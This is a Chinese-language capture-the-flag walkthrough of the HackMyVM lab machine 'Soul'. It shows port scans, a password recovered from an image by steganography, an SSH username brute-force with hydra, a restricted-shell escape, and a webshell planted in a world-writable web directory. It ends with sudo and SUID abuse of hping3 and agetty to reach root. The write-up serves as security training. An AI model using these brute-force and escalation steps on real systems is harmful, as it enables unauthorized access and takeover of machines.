打靶记录(九二)之HMVSoul

所渗透的靶机IP为192.168.56.115

端口扫描

sudo nmap --min-rate 10000 -p- 192.168.56.115      
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-16 09:32 UTC
Nmap scan report for 192.168.56.115 (192.168.56.115)
Host is up (0.00031s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:C6:C3:71 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.59 seconds

sudo nmap -sT -sV -sC -O -p22,80 192.168.56.115                              
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-16 09:32 UTC
Nmap scan report for 192.168.56.115 (192.168.56.115)
Host is up (0.00029s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 8a:e9:c1:c2:a3:44:40:26:6f:22:37:c3:fe:a1:19:f2 (RSA)
|   256 4f:4a:d6:47:1a:87:7e:69:86:7f:5e:11:5c:4f:f1:48 (ECDSA)
|_  256 46:f4:2c:28:53:ef:4c:2b:70:f8:99:7e:39:64:ec:07 (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:C6:C3:71 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.10 seconds

Getshell

根据robots.txt得到/nothing，也就是说什么都没有了。只有一个saint.jpg了。虽然一开始并不想往隐写方面做，但事实上还真是隐写

stegseek saint.jpg                            
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: ""
[i] Original filename: "pass.txt".
[i] Extracting to "saint.jpg.out".

cat saint.jpg.out 
lionsarebigcats

也就是说原本的pass.txt内容为lionsarebigcats，应该是密码。没有别的地方用了，那就爆破ssh吧，感觉这个作者的房间都很怪(

hydra -L /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -p lionsarebigcats ssh://192.168.56.115 
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-02-16 09:41:31
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 8295455 login tries (l:8295455/p:1), ~518466 tries per task
[DATA] attacking ssh://192.168.56.115:22/
[22][ssh] host: 192.168.56.115   login: daniel   password: lionsarebigcats

得到凭证daniel:lionsarebigcats

直接ssh连接

提权

结果发现这个用户的环境是rbash，也就是受限制的bash

chsh -s /bin/bash daniel

发现是有权限改bash环境的，改完之后重新登录发现不受限制了

发现没有什么其他敏感信息，传pspy，发现有一个进程，在搜SUID的时候也有这个

/sbin/agetty -o -p -- \u --noclear tty1 linux
-rwsrws--- 1 root peter 64744 Jan 10  2019 /usr/sbin/agetty

就是一个peter用户能够使用的root文件，也就是要拿到peter权限来到达root

发现/var/www/html目录的权限是chmod 777,于是试着写入webshell拿到www-data权限

cat /etc/nginx/sites-enabled/default

找到域名lonelysoul.hmv，添加hosts,不然似乎是不会解析的

拿到www-data权限之后sudo -l，可以以gabriel用户身份执行一个/tmp/whoami,但是这个目录下没有这文件，尝试写一个/bin/bash，然后我们拿到了gabriel权限

sudo -l
sudo -l
Matching Defaults entries for gabriel on soul:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User gabriel may run the following commands on soul:
    (peter) NOPASSWD: /usr/sbin/hping3

gabriel@soul:~$ sudo -u peter /usr/sbin/hping3
sudo -u peter /usr/sbin/hping3
hping3> /bin/bash
/bin/bash

/usr/sbin/agetty -o -p -l /bin/sh -a root tty

现在我们是root!

碎碎念

这个作者的房间的风格真的怪，有点偏CTF脑洞吧。不过除了后面拿www-data权限可能想不到，其实这个房间还是很简单的，难度应该差不多是easy/medium